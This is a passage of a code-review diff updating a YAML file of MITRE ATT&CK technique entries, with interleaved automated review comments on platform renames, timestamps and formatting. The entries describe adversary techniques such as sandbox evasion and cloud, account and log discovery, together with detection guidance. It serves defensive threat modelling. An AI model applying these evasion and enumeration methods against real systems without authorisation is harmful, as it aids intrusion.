+ url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1497.003:
+ technique:
+ modified: '2024-09-12T15:50:18.048Z'
name: Time Based Evasion
description: |-
Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
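Review bot: `x_mitre_permissions_required: User` is removed from T1087.003 (`- x_mitre_permissions_required:` / `- - User`) with no replacement, so the object no longer records the privilege level needed to dump the GAL; the `elevation_required` flag on atomic tests covers individual tests, not the technique, and this object has no tests. If the field has been retired upstream that is fine, but it should be called out. Second, `x_mitre_platforms` goes from `Windows`, `Office 365`, `Google Workspace` to `Windows`, `Office Suite`, which is a rename rather than a narrowing of scope; anything that filters this file on the old platform strings will silently drop T1087.003. The description fix from `theGet-GlobalAddressList` to `the Get-GlobalAddressList` is correct. Everything else in this hunk is the same data in a different key order; a stable key order in the generator would keep future diffs reviewable.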
@@ -84558,6 +85206,12 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Jorge Orchilles, SCYTHE
+ - Ruben Dodge, @shotgunner101
+ - Jeff Felling, Red Canary
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -84567,9 +85221,14 @@ discovery:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -84579,102 +85238,137 @@ discovery:
- Signature-based detection
- Static File Analysis
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ created: '2020-03-06T21:11:11.225Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/003
+ external_id: T1497.003
+ - source_name: Joe Sec Nymaim
+ description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+ API hammering. Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/3660886847485093803
+ - source_name: Joe Sec Trickbot
+ description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+ Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/498839998833561473
+ - source_name: ISACA Malware Tricks
+ description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+ Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+ url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+ - source_name: Revil Independence Day
+ description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+ supply chain exploit to attack hundreds of businesses. Retrieved September
+ 30, 2021.'
+ url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+ - source_name: Netskope Nitol
+ description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+ with evasive sandbox analysis technique. Retrieved September 30, 2021.
+ url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.003
atomic_tests: []
T1580:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-30T13:28:37.415Z'
+ name: Cloud Infrastructure Discovery
+ description: |-
+ An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+ Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances
API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets
API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket
API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock
API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list
command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list
lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+ An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances
to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
x_mitre_contributors:
- Regina Elwell
- Praetorian
- Isif Ibrahima, Mandiant
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+ components. Monitor logs for actions that could be taken to gather information
+ about cloud infrastructure, including the use of discovery API calls by new
+ or unexpected users and enumerations from unknown or malicious IP addresses.
+ To reduce false positives, valid change management procedures could introduce
+ a known identifier that is logged with the change (e.g., tag or header) if
+ supported by the cloud provider, to help distinguish valid, expected actions
+ from malicious ones.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Instance: Instance Enumeration'
+ - 'Cloud Storage: Cloud Storage Enumeration'
+ - 'Volume: Volume Enumeration'
+ - 'Snapshot: Snapshot Enumeration'
type: attack-pattern
id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
created: '2020-08-20T17:51:25.671Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1580
url: https://attack.mitre.org/techniques/T1580
+ external_id: T1580
- source_name: Expel IO Evil in AWS
- url: https://expel.io/blog/finding-evil-in-aws/
description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
Evil in AWS. Retrieved June 25, 2020.
+ url: https://expel.io/blog/finding-evil-in-aws/
- source_name: AWS Head Bucket
- url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
description: Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February
14, 2022.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
- source_name: AWS Get Public Access Block
- url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
- source_name: AWS Describe DB Instances
- url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+ url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
- source_name: Amazon Describe Instance
- url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
description: Amazon. (n.d.). describe-instance-information. Retrieved March
3, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
- source_name: Amazon Describe Instances API
- url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+ url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
- source_name: Google Compute Instances
- url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
description: Google. (n.d.). gcloud compute instances list. Retrieved May
26, 2020.
+ url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
- source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
- source_name: Microsoft AZ CLI
- url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
- source_name: Malwarebytes OSINT Leaky Buckets - Hioureas
- url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
description: 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating
leaky buckets into your OSINT workflow. Retrieved February 14, 2022.'
- x_mitre_deprecated: false
- revoked: false
- description: |-
- An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
-
- Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances
API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets
API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket
API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock
API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list
command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list
lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
-
- An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances
to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Cloud Infrastructure Discovery
- x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
- components. Monitor logs for actions that could be taken to gather information
- about cloud infrastructure, including the use of discovery API calls by new
- or unexpected users and enumerations from unknown or malicious IP addresses.
- To reduce false positives, valid change management procedures could introduce
- a known identifier that is logged with the change (e.g., tag or header) if
- supported by the cloud provider, to help distinguish valid, expected actions
- from malicious ones.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Instance: Instance Enumeration'
- - 'Cloud Storage: Cloud Storage Enumeration'
- - 'Volume: Volume Enumeration'
- - 'Snapshot: Snapshot Enumeration'
- x_mitre_attack_spec_version: 2.1.0
+ url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1580
atomic_tests: []
T1217:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-16T14:24:40.625Z'
name: Browser Bookmark Discovery
description: |-
Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
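Review bot: the T1217 `modified` timestamp moves backwards, from `2023-05-09T14:00:00.188Z` to `2023-04-16T14:24:40.625Z`, and the same happens to T1482 (`2022-11-08` to `2022-06-16`) and T1049 (`2022-11-08` to `2022-09-06`) later in this patch, while every other object here moves forward into 2024. The old values all share the `14:00:00.188Z` release-stamp pattern, so this may simply be upstream replacing a bulk release date with the real edit time, but it could also mean those three objects were taken from a different snapshot; the next hunk leaves T1217 on `x_mitre_attack_spec_version: 3.1.0` while the objects with forward-moving timestamps go to 3.2.0, which fits the second reading. Please confirm the source bundle version in the PR description. Two upstream content issues remain visible in T1580 and should not be hand-fixed in a generated file, but are worth reporting to ATT&CK: the `Microsoft AZ CLI` reference cited for `az vm list` points at the `az ad user` docs, and the description still reads `Persistence.(Citation: Mandiant M-Trends 2020)An adversary` and `Adversaries have also may use`. The M-Trends 2020 URL change to the mandiant.com PDF is fine.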
@@ -84728,7 +85422,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1217
atomic_tests:
- name: List Google Chrome / Opera Bookmarks on Windows with powershell
@@ -84851,7 +85544,7 @@ discovery:
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, (LinkById: T1059.008) commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
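Review bot: the replacement text in `x_mitre_detection` is malformed: `{{LinkById|T1059.008}` opens with two braces and closes with one, and, like the `(LinkById: T1059.008)` it replaces, it is raw template markup that nothing renders in this file, so the reader gets a broken token in the middle of a sentence about network device CLI. If the string is copied verbatim from the upstream STIX, the fix belongs upstream and this hunk should just be noted as such; if the generator produced it, it needs the closing `}}`, or better the Markdown link form already used in the same sentence for T1047 and T1059.001.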
@@ -84889,7 +85582,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1016
atomic_tests:
- name: System Network Configuration Discovery on Windows
@@ -85059,7 +85751,7 @@ discovery:
name: command_prompt
T1087:
technique:
- modified: '2024-01-12T23:36:56.245Z'
+ modified: '2024-10-15T15:35:28.784Z'
name: Account Discovery
description: |-
Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
@@ -85086,14 +85778,13 @@ discovery:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
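Review bot: anything that builds a per-platform view of this file by matching the strings `Azure AD`, `Office 365` or `Google Workspace` will stop listing T1087 after this hunk, because `x_mitre_platforms` now carries `Office Suite` and `Identity Provider` instead (with the version bump to 2.5). This is the same platform consolidation applied to T1087.003 earlier in the patch; the mapping from platform name to index needs the new names, either in this PR or in a follow-up that regenerates whatever is keyed on platform, and the PR description should mention it.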
@@ -85122,7 +85813,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1482:
technique:
@@ -85182,7 +85872,7 @@ discovery:
.NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
[Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-06-16T19:18:22.305Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Domain Trust Discovery
x_mitre_detection: |
@@ -85201,7 +85891,6 @@ discovery:
- 'Process: OS API Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1482
atomic_tests:
- name: Windows - Discover domain trusts with dsquery
@@ -85470,7 +86159,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1083
atomic_tests:
- name: File and Directory Discovery (cmd.exe)
@@ -85624,7 +86312,7 @@ discovery:
elevation_required: false
T1049:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-09-06T22:35:34.231Z'
name: System Network Connections Discovery
description: "Adversaries may attempt to get a listing of network connections
to or from the compromised system they are currently accessing or from remote
@@ -85701,7 +86389,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1049
atomic_tests:
- name: System Network Connections Discovery
@@ -85775,35 +86462,7 @@ discovery:
#{SharpView} $syntax -}
T1497:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- created: '2019-04-17T22:22:24.505Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.049Z'
name: Virtualization/Sandbox Evasion
description: |+
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -85815,6 +86474,10 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_deprecated: false
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -85825,8 +86488,14 @@ discovery:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
x_mitre_version: '1.3'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -85836,9 +86505,28 @@ discovery:
- Host forensic analysis
- Signature-based detection
- Static File Analysis
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ created: '2019-04-17T22:22:24.505Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497
+ external_id: T1497
+ - source_name: Unit 42 Pirpi July 2015
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1619:
technique:
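Review bot: Dropping `spec_version: '2.1'` (L365579, and repeated for every object this diff touches) removes the STIX spec-version marker that validators and downstream importers may check; if this mirrors the upstream ATT&CK export format, say so in the commit message, otherwise keep the key. Separately, the re-added Deloitte reference URL now ends in `/edit` (`https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit`, L365598), which differs from the bare file link removed earlier in the diff; confirm it still resolves for readers without edit rights before shipping the new retrieved date.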
@@ -85871,7 +86559,7 @@ discovery:
Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-11T22:29:43.677Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Cloud Storage Object Discovery
x_mitre_detection: "System and network discovery techniques normally occur throughout
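Review bot: `modified` for T1619 moves backwards, from `2022-05-11T14:00:00.188Z` to `2022-04-11T22:29:43.677Z` (L365609/L365610). Any tooling that treats a later `modified` as newer data will read this as a downgrade; if the old `.188Z` values were bulk-stamped locally and the new value is the upstream authoritative timestamp, state that in the PR description so the regression is not mistaken for a stale import. The same backwards move appears for T1069.001, T1614.001 and T1012 later in the diff.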
@@ -85889,12 +86577,11 @@ discovery:
- 'Cloud Storage: Cloud Storage Enumeration'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1619
atomic_tests: []
T1654:
technique:
- modified: '2023-09-30T22:18:46.711Z'
+ modified: '2024-10-15T12:24:40.892Z'
name: Log Enumeration
description: |-
Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
@@ -85902,11 +86589,14 @@ discovery:
Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+ In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
x_mitre_contributors:
- Bilal Bahadır Yenici
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
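Review bot: The new paragraph on L365632 introduces `(Citation: Permiso GUI-Vil 2023)`; citation keys resolve against `source_name` under `external_references` byte for byte, so the entry added further down (`source_name: Permiso GUI-Vil 2023`) must stay exactly in sync if either side is touched again. Also, `x_mitre_detection: ''` on L365640 stays empty while the description now adds a behaviour (real-time log monitoring to track incident response); that is upstream content, but whatever renders these fields should cope with an empty detection string next to a non-empty description.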
@@ -85917,7 +86607,7 @@ discovery:
- macOS
- Windows
- IaaS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
@@ -85931,6 +86621,10 @@ discovery:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1654
external_id: T1654
+ - source_name: Permiso GUI-Vil 2023
+ description: 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated
+ Cloud Threat Actor. Retrieved August 30, 2024.'
+ url: https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
- source_name: SIM Swapping and Abuse of the Microsoft Azure Serial Console
description: 'Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse
of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced
@@ -85950,7 +86644,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1654
atomic_tests:
- name: Get-EventLog To Enumerate Windows Security Log
@@ -85986,51 +86679,7 @@ discovery:
name: command_prompt
T1087.004:
technique:
- x_mitre_platforms:
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Google Workspace
- x_mitre_domains:
